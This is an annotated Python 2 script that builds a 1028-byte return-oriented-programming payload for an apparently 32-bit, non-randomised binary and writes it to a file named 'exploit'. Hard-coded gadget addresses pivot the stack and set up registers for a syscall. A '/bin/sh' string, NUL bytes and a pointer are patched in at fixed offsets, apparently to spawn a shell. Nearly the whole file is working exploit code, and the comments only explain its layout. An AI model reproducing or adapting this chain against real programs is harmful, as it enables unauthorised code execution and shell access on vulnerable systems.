# Flat Python 2 script that assembles a fixed byte string and writes it to a
# file named "exploit" in the current directory: it packs a set of hard-coded
# 32-bit addresses little-endian, concatenates them with filler bytes, patches
# a string and NUL bytes in at fixed offsets, and saves the 1028-byte result.
#
# Python 2 only: struct.pack() returns str there, so `payload += "B" * 4` and
# the later list()/"".join() round-trip work.  On Python 3 pack() returns
# bytes and the first `+=` with a str literal raises TypeError.
import struct
# Absolute addresses the chain is built from.  The 0x08...... values look like
# text-segment addresses of a 32-bit binary and the 0xbfff.... values like
# stack addresses (a base plus 0x30 + 0x20); both are treated as fixed, so the
# layout only lines up when nothing is randomised -- presumably a non-PIE
# binary with stack ASLR disabled, which cannot be confirmed from this file.
# The variable names suggest what each 0x08 address points at (pop esp,
# xor eax,eax, add eax, pop ebx, pop edx, pop ecx, syscall, original return);
# the code at those addresses is not visible here.
addr_popesp = 0x080bbf66;
addr_pivot = 0xbfffec80 + 0x30 + 0x20;
addr_xoreaxeax = 0x0807d70f;
addr_addeax = 0x0808ee92;
addr_popebx = 0x080481c9;
addr_str = 0xbfffece4 + 0x30 + 0x20;
addr_popedx = 0x0806fd6a;
# addr_nulls is addr_str + 7 and addr_straddr is addr_str + 12; these offsets
# match where the patch loops near the end write, relative to index 100.
addr_nulls = 0xbfffeceb + 0x30 + 0x20;
addr_popecx = 0x080e5885;
addr_straddr = 0xbfffecf0 +0x30 + 0x20;
addr_syscall = 0x08070430;
addr_original = 0x8048f2b;
# Each address as a 4-byte little-endian word.
popesp = struct.pack("<I",addr_popesp)
pivot = struct.pack("<I",addr_pivot)
xoreaxeax = struct.pack("<I",addr_xoreaxeax)
addeax = struct.pack("<I",addr_addeax)
popebx = struct.pack("<I",addr_popebx)
# 0xDEADC0DE is a recognisable marker word, not an address; presumably kept
# so the spot is easy to find in a crash dump or debugger -- TODO confirm.
test = struct.pack("<I",0xDEADC0DE)
# NOTE(review): `str` shadows the builtin for the rest of the script; it is
# reused by name in the second patch loop below, so renaming must be done in
# both places.
str = struct.pack("<I",addr_str)
popedx = struct.pack("<I",addr_popedx)
nulls = struct.pack("<I",addr_nulls)
popecx = struct.pack("<I",addr_popecx)
straddr = struct.pack("<I",addr_straddr)
syscall = struct.pack("<I",addr_syscall)
original = struct.pack("<I",addr_original)
# Layout: 12 packed words (48 bytes) followed by 972 filler bytes = 1020,
# then two more words, for 1028 bytes in total.  The bytes patched further
# down (indices 100-119) fall inside the "A" filler region (indices 48-1019).
payload = xoreaxeax
payload += addeax
payload += "B" * 4
payload += popebx
payload += str
payload += popedx
payload += nulls
payload += popecx
payload += straddr
payload += syscall
payload += original
payload += test
payload += "A" * 972
payload += popesp
payload += pivot
# Earlier layouts kept by the author (commented out; not used).
#payload = "A" * 1020
#payload += "B" * 4
#payload = xoreaxeax
#payload += addeax
#payload += "B" * 4
#payload += original
#payload += "A" * 1004
#payload += popesp
#payload += pivot
# Explode into one-character strings so single bytes can be overwritten.
paylist = list(payload)
shell = "/bin/sh"
i = 100;
# "/bin/sh" occupies indices 100-106; i ends at 107.
for c in shell:
    paylist[i] = c
    i = i + 1
# Four NUL bytes at indices 107-110 (the location addr_nulls refers to).
paylist[i] = '\0'
paylist[i+1] = '\0'
paylist[i+2] = '\0'
paylist[i+3] = '\0'
# i becomes 112: index 111 is skipped and keeps its "A" filler byte.
i = i+5
# The 4 packed bytes of `str` (the addr_str word) go at 112-115; i ends at 116.
for c in str:
    paylist[i] = c
    i = i + 1
# Four more NUL bytes at indices 116-119.
paylist[i] = '\0'
paylist[i+1] = '\0'
paylist[i+2] = '\0'
paylist[i+3] = '\0'
payload = "".join(paylist)
# NOTE(review): `file` shadows the Python 2 builtin of that name, and the
# file is opened in text mode; "wb" (and a with-block) would be the
# conventional way to write raw bytes.  No 0x0a byte occurs in the packed
# words above, so text-mode newline translation does not affect this output
# on any platform.
file = open("exploit","w")
file.write(payload)
file.close()